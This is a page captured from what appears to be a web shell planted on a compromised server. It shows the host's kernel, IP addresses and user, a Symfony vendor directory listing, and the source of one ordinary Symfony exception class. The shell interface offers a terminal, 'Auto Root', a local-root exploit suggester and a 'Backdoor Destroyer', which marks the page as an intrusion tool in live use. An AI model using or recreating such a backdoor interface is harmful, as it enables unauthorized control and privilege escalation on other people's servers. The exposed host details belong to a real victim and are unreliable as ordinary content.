Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.117.132.79
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
1 /
vendor /
symfony /
http-kernel /
Exception /
Delete
Unzip
Name
Size
Permission
Date
Action
AccessDeniedHttpException.php
858
B
-rw-r--r--
2020-11-17 16:24
BadRequestHttpException.php
803
B
-rw-r--r--
2020-11-17 16:24
ConflictHttpException.php
801
B
-rw-r--r--
2020-11-17 16:24
ControllerDoesNotReturnResponseException.php
2.28
KB
-rw-r--r--
2020-11-17 16:24
GoneHttpException.php
797
B
-rw-r--r--
2020-11-17 16:24
HttpException.php
1.11
KB
-rw-r--r--
2020-11-17 16:24
HttpExceptionInterface.php
710
B
-rw-r--r--
2020-11-17 16:24
LengthRequiredHttpException.php
807
B
-rw-r--r--
2020-11-17 16:24
MethodNotAllowedHttpException.php
954
B
-rw-r--r--
2020-11-17 16:24
NotAcceptableHttpException.php
806
B
-rw-r--r--
2020-11-17 16:24
NotFoundHttpException.php
808
B
-rw-r--r--
2020-11-17 16:24
PreconditionFailedHttpException.php
811
B
-rw-r--r--
2020-11-17 16:24
PreconditionRequiredHttpException.php
859
B
-rw-r--r--
2020-11-17 16:24
ServiceUnavailableHttpException.php
1.01
KB
-rw-r--r--
2020-11-17 16:24
TooManyRequestsHttpException.php
1.06
KB
-rw-r--r--
2020-11-17 16:24
UnauthorizedHttpException.php
950
B
-rw-r--r--
2020-11-17 16:24
UnexpectedSessionUsageException.php
416
B
-rw-r--r--
2020-11-17 16:24
UnprocessableEntityHttpException.php
821
B
-rw-r--r--
2020-11-17 16:24
UnsupportedMediaTypeHttpException.php
813
B
-rw-r--r--
2020-11-17 16:24
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpKernel\Exception; /** * @author Grégoire Pineau <lyrixx@lyrixx.info> */ class ControllerDoesNotReturnResponseException extends \LogicException { public function __construct(string $message, callable $controller, string $file, int $line) { parent::__construct($message); if (!$controllerDefinition = $this->parseControllerDefinition($controller)) { return; } $this->file = $controllerDefinition['file']; $this->line = $controllerDefinition['line']; $r = new \ReflectionProperty(\Exception::class, 'trace'); $r->setAccessible(true); $r->setValue($this, array_merge([ [ 'line' => $line, 'file' => $file, ], ], $this->getTrace())); } private function parseControllerDefinition(callable $controller): ?array { if (\is_string($controller) && false !== strpos($controller, '::')) { $controller = explode('::', $controller); } if (\is_array($controller)) { try { $r = new \ReflectionMethod($controller[0], $controller[1]); return [ 'file' => $r->getFileName(), 'line' => $r->getEndLine(), ]; } catch (\ReflectionException $e) { return null; } } if ($controller instanceof \Closure) { $r = new \ReflectionFunction($controller); return [ 'file' => $r->getFileName(), 'line' => $r->getEndLine(), ]; } if (\is_object($controller)) { $r = new \ReflectionClass($controller); try { $line = $r->getMethod('__invoke')->getEndLine(); } catch (\ReflectionException $e) { $line = $r->getEndLine(); } return [ 'file' => $r->getFileName(), 'line' => $line, ]; } return null; } }